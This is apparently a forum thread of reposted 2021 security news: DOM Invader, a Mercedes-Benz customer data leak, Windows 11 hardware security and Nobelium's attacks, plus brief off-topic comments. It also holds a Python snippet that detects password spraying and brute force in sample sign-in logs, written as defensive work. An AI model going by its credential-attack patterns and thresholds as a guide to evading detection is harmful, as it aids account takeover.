Hopefully, you're now raring to go and find some DOM XSS with DOM Invader. We think there's plenty out there. In fact, we know there is, because we recently struck gold on a well-known bug bounty program while testing DOM Invader's functionality. Head over to the research channel to read up about the PayPal DOM XSS I found.

To get started with DOM Invader, download the latest early adopter version of Burp Suite Professional/Community Edition and head to the embedded browser. View the full documentation for DOM Invader. Don't forget to follow @PortSwiggerRes on Twitter for the latest Burp Suite news and hacking exploits. That includes a writeup of the hack above.

Gareth Heyes @garethheyes

Source: https://portswigger.net/blog/introducing-dom-invader
-
28 JUN 2021 NEWS
Mercedes Benz Data Leak Includes Card and Social Security Details
Phil Muncaster, UK / EMEA News Reporter, Infosecurity Magazine

Mercedes Benz has released details of a data breach affecting customers and prospective buyers in the US. The luxury carmaker said a vendor had informed the company on June 11 that the information was “inadvertently made accessible on a cloud storage platform.” It appears that a third-party security researcher first raised the alarm.

Although the initial investigation was set to discover whether 1.6 million unique records had been exposed, subsequent findings indicated far fewer customers and interested buyers were affected. “The vendor reports that the personal information for these individuals (less than 1,000) is comprised mainly of self-reported credit scores as well as a very small number of driver’s license numbers, social security numbers, credit card information and dates of birth,” the statement noted. “To view the information, one would need knowledge of special software programs and tools — an internet search would not return any information contained in these files.”

These individuals entered the information in question on dealer and Mercedes-Benz websites between January 1, 2014, and June 19, 2017. Mercedes Benz USA confirmed that none of its systems were compromised in the incident and said the issue had been mitigated by the security vendor and can’t happen again. Although it’s unlikely that threat actors managed to locate and access the information, it’s unclear how long it had been exposed for.

Mercedes-Benz USA has begun notifying those affected and said that anyone who had credit card information, driver’s license or social security numbers exposed will be offered a free 24-month subscription to a credit monitoring service. Tom Garrubba, CISO at risk management firm Shared Assessments, welcomed the carmaker’s prompt action.
“With all the cyber-incidents that have been reported recently, it is refreshing to see the swift action taken by Mercedes Benz USA in addressing the incident with their cloud service provider and ultimately, with their customers," he added. “The reported breach of 1000 existing and prospective customers via their cloud storage vendor’s platform should raise awareness of the importance of proper due diligence and understanding as to how your cloud service providers are protecting your data.”

Source: https://www.infosecurity-magazine.com/news/mercedes-benz-leak-card-social/
-
Windows 11 enables security by design from the chip to the cloud
David Weston, Director of Enterprise and OS Security

Over the last year, PCs have kept us connected to family, friends, and enabled businesses to continue to run. This new hybrid work paradigm has got us thinking about how we will continue to deliver the best possible quality, experience, and security for the more than 1 billion people who use Windows. While we have adapted to working from home, it’s been rare to get through a day without reading an account of a new cybersecurity threat. Phishing, ransomware, supply chain, and IoT vulnerabilities—attackers are constantly developing new approaches to wreak digital havoc.

But as attacks have increased in scope and sophistication, so have we. Microsoft has a clear vision for how to help protect our customers now and in the future and we know our approach works. Today, we are announcing Windows 11 to raise security baselines with new hardware security requirements built-in that will give our customers the confidence that they are even more protected from the chip to the cloud on certified devices. Windows 11 is redesigned for hybrid work and security with built-in hardware-based isolation, proven encryption, and our strongest protection against malware.

Security by design: Built-in and turned on

Security by design has long been a priority at Microsoft. What other companies invest more than $1 billion a year on security and employ more than 3,500 dedicated security professionals? We’ve made significant strides in that journey to create chip-to-cloud Zero Trust out of the box. In 2019, we announced secured-core PCs that apply security best-practices to the firmware layer, or device core, that underpins Windows.
These devices combine hardware, software, and OS protections to help provide end-to-end safeguards against sophisticated and emerging threats like those against hardware and firmware that are on the rise according to the National Institute of Standards and Technology as well as the Department of Homeland Security. Our Security Signals report found that 83 percent of businesses experienced a firmware attack, and only 29 percent are allocating resources to protect this critical layer. With Windows 11, we’re making it easier for customers to get protection from these advanced attacks out of the box. All certified Windows 11 systems will come with a TPM 2.0 chip to help ensure customers benefit from security backed by a hardware root-of-trust. The Trusted Platform Module (TPM) is a chip that is either integrated into your PC’s motherboard or added separately into the CPU. Its purpose is to help protect encryption keys, user credentials, and other sensitive data behind a hardware barrier so that malware and attackers can’t access or tamper with that data. PCs of the future need this modern hardware root-of-trust to help protect from both common and sophisticated attacks like ransomware and more sophisticated attacks from nation-states. Requiring the TPM 2.0 elevates the standard for hardware security by requiring that built-in root-of-trust. TPM 2.0 is a critical building block for providing security with Windows Hello and BitLocker to help customers better protect their identities and data. In addition, for many enterprise customers, TPMs help facilitate Zero Trust security by providing a secure element for attesting to the health of devices. Windows 11 also has out of the box support for Azure-based Microsoft Azure Attestation (MAA) bringing hardware-based Zero Trust to the forefront of security, allowing customers to enforce Zero Trust policies when accessing sensitive resources in the cloud with supported mobile device managements (MDMs) like Intune or on-premises. 
Raising the security baseline to meet the evolving threat landscape. This next generation of Windows will raise the security baseline by requiring more modern CPUs, with protections like virtualization-based security (VBS), hypervisor-protected code integrity (HVCI), and Secure Boot built-in and enabled by default to protect from both common malware, ransomware, and more sophisticated attacks. Windows 11 will also come with new security innovations like hardware-enforced stack protection for supported Intel and AMD hardware, helping to proactively protect our customers from zero-day exploits. Innovation like the Microsoft Pluton security processor, when used by the great partners in the Windows ecosystem, help raise the strength of the fundamentals at the heart of robust Zero Trust security. Ditch passwords with Windows Hello to help keep your information protected. For enterprises, Windows Hello for Business supports simplified passwordless deployment models for achieving a deploy-to-run state within a few minutes. This includes granular control of authentication methods by IT admins while securing communication between cloud tools to better protect corporate data and identity. And for consumers, new Windows 11 devices will be passwordless by default from day one. Security and productivity in one. All these components work together in the background to help keep users safe without sacrificing quality, performance, or experience. The new set of hardware security requirements that comes with this new release of Windows is designed to build a foundation that is even stronger and more resistant to attacks on certified devices. We know this approach works—secured-core PCs are twice as resistant to malware infection. Comprehensive security and compliance. 
Out of the box support for Microsoft Azure Attestation enables Windows 11 to provide evidence of trust via attestation, which forms the basis of compliance policies organizations can depend upon to develop an understanding of their true security posture. These Azure Attestation-backed compliance policies validate both the identity, as well as the platform, and form the backbone for the Zero Trust and Conditional Access workflows for safeguarding corporate resources. This next level of hardware security is compatible with upcoming Pluton-equipped systems and also any device using the TPM 2.0 security chip, including hundreds of devices available from Acer, Asus, Dell, HP, Lenovo, Panasonic, and many others. Windows 11 is a smarter way for everyone to collaborate, share, and present—with the confidence of hardware-backed protections. Learn more For more information, check out the other features that come with Windows 11: Windows 11 for Business Windows 11 for Enterprise To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity. Sursa: https://www.microsoft.com/security/blog/2021/06/25/windows-11-enables-security-by-design-from-the-chip-to-the-cloud/
-
- 1
-
-
Nobelium hackers accessed Microsoft customer support tools
By Lawrence Abrams, June 26, 2021

Microsoft says they have discovered new attacks conducted by the Russian state-sponsored Nobelium hacking group, including a hacked Microsoft support agent's computer that exposed customers' subscription information. Nobelium is Microsoft's name for a state-sponsored hacking group believed to be operating out of Russia responsible for the SolarWinds supply-chain attacks.

In a new blog post published Friday night, Microsoft states that the hacking group has been conducting password spray and brute-force attacks to gain access to corporate networks. Password spray and brute force attacks are similar in that they both attempt to gain unauthorized access to an online account by guessing a password. However, password spray attacks will attempt to use the same passwords across multiple accounts simultaneously to evade defenses. In contrast, brute force attacks repeatedly target a single account with different password attempts.

Microsoft says that Nobelium's recent attacks have been mostly unsuccessful. However, they know of three entities that were breached by Nobelium in these attacks. "This activity was targeted at specific customers, primarily IT companies (57%), followed by government (20%), and smaller percentages for non-governmental organizations and think tanks, as well as financial services," Microsoft said in a blog post about the attacks. "The activity was largely focused on US interests, about 45%, followed by 10% in the UK, and smaller numbers from Germany and Canada. In all, 36 countries were targeted."

Microsoft support tools accessed by hackers

During the investigation into the attacks, Microsoft also detected an information-stealing trojan on a Microsoft customer support agent's computer that provided access to "basic account information" for a limited number of customers. Nobelium used this customer information in targeted phishing attacks against Microsoft customers. Microsoft reported these attacks after Reuters obtained an email sent to affected customers warning them that the threat actors gained access to information about their Microsoft Services subscriptions. "A sophisticated Nation-State associated actor that Microsoft identifies as NOBELLIUM accessed Microsoft customer support tools to review information regarding your Microsoft Services subscriptions," read the Microsoft email obtained by Reuters.

Nobelium's recent activity

The Nobelium hacking group, also known as APT29, Cozy Bear, and The Dukes, has been attributed to the recent SolarWinds supply chain attack that compromised numerous US companies, including Microsoft, FireEye, Cisco, Malwarebytes, Mimecast, and various US government agencies. As part of these attacks, the threat actors replaced legitimate modules in the SolarWinds Orion IT monitoring platform that were distributed to customers via the software's normal auto-update process. These malicious modules allowed the threat actors to gain remote access to compromised devices, where further internal attacks could be launched. In April, the US government formally accused the Russian government and hackers from the Russian Foreign Intelligence Service, the SVR, of the attacks on SolarWinds and US interests.

More recently, Microsoft revealed that the hacking group compromised the Constant Contact account for USAID, a US agency responsible for providing foreign aid and development assistance. Using this marketing account, Nobelium conducted targeted phishing attacks to distribute malware and access internal networks.

[Image: USAID phishing email sent by Nobelium hackers]

The US Department of Justice later seized two domains used in the phishing attacks to distribute malware.

Source: https://www.bleepingcomputer.com/news/microsoft/nobelium-hackers-accessed-microsoft-customer-support-tools/
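As an added illustration of the spray-versus-brute-force distinction the article draws (example code written for this page, not from Microsoft or BleepingComputer), the Python below groups constructed failed sign-in events by source address and labels each source by the pattern it shows in a sliding window. The sample events, the 10-minute window and the thresholds are assumptions to be tuned per environment.

```python
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed sample of failed sign-in events, not real log data:
# (ISO timestamp, source IP, target account), documentation-range IPs.
SAMPLE_EVENTS = [
    ("2021-06-25T10:00:01", "198.51.100.7", "alice"),
    ("2021-06-25T10:00:03", "198.51.100.7", "bob"),
    ("2021-06-25T10:00:05", "198.51.100.7", "carol"),
    ("2021-06-25T10:00:08", "198.51.100.7", "dave"),
    ("2021-06-25T10:00:11", "198.51.100.7", "erin"),
    ("2021-06-25T10:00:14", "198.51.100.7", "frank"),
] + [
    ("2021-06-25T10:01:%02d" % s, "203.0.113.9", "admin") for s in range(8)
] + [
    ("2021-06-25T10:05:00", "192.0.2.44", "grace"),
    ("2021-06-25T10:05:30", "192.0.2.44", "grace"),
]

def classify_sources(events, window=timedelta(minutes=10),
                     spray_accounts=5, brute_attempts=6):
    """Label each source IP as "spray", "brute_force" or "benign".

    Spray: one source touches many distinct accounts (few tries each)
    inside one window. Brute force: one source hammers a single account.
    Thresholds are illustrative assumptions, not vendor defaults.
    """
    by_source = defaultdict(list)
    for ts, src, account in events:
        by_source[src].append((datetime.fromisoformat(ts), account))
    verdicts = {}
    for src, attempts in by_source.items():
        attempts.sort()  # chronological order per source
        max_accounts = max_single = 0
        for i, (start, _) in enumerate(attempts):
            counts = Counter()  # attempts per account in this window
            for ts, account in attempts[i:]:
                if ts - start > window:
                    break
                counts[account] += 1
            max_accounts = max(max_accounts, len(counts))
            max_single = max(max_single, max(counts.values()))
        if max_accounts >= spray_accounts:
            verdicts[src] = "spray"
        elif max_single >= brute_attempts:
            verdicts[src] = "brute_force"
        else:
            verdicts[src] = "benign"
    return verdicts
```

Calling `classify_sources(SAMPLE_EVENTS)` labels 198.51.100.7 as spray, 203.0.113.9 as brute force and 192.0.2.44 as benign; in practice the events would come from sign-in logs and the per-account counter is what distinguishes the two patterns the article describes.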
-
- 1
-
-
https://www.agerpres.ro/economic-extern/2021/06/24/microsoft-prezinta-joi-o-noua-versiune-a-sistemului-de-operare-windows--736653?
-
John McAfee dead: Antivirus tycoon found lifeless in prison after court OKs extradition
UK-born wild man of infosec faced trial in America for tax evasion
Iain Thomson in San Francisco, Wed 23 Jun 2021 // 19:52 UTC

John McAfee was found dead in his cell in a Barcelona prison on Wednesday, according to the Catalan justice department. Spain’s high court – the Audiencia Nacional – had just hours earlier agreed to his extradition to America to stand trial for alleged tax evasion. The 75-year-old, British-born former antivirus baron, who founded McAfee Associates in the late 1980s and made his millions before more or less retiring in the mid-1990s, was being held at a prison in Sant Esteve Sesrovires following his arrest at Barcelona airport in October 2020. Prosecutors are investigating his death, and believe at this stage it was suicide, Spanish newspaper El Pais reported. Officials confirmed to Reuters the infosec world's wild man had been discovered lifeless in his cell. This is a developing story. Stand by for updates.

Source: https://www.theregister.com/2021/06/23/john_mcafee_dead/
-
Yes, I understand you, I've kept hearing about this too. One possible problem would be overheating if they are poorly built, but I think all of them get hot if they are pushed a bit. I would recommend that you go by the specifications but also take the cooling into account, or even what keyboard it has (I had problems after 7 years with an Asus ROG, but the poor thing endured a lot).
-
Why would I need a phone? I'm posting right now just thinking about it.
-
I had a Toshiba 10 years ago. It still works; my dad watches movies on it. Then I had an ASUS ROG, it still works but I don't use it anymore. Now I have a Lenovo which, likewise, is flawless. At work I think I've had HP, Dell, MacBook and Lenovo. I never really understood these comparisons between brands because I have never had any problem with any laptop.
-
I would be more interested in the stability side than in security. Windows 10 is OK from this point of view, so I'm not worried about a new version.
-
I'm also vaccinated, I also did a PCR test some time ago and several antigen tests (done by myself, at home, before going to various places). I haven't died, but I guess I don't have long left to live, right?
-
Yes, you realize it's fine.
-
Nice, I see it's apparently used to send money; they could have given something better.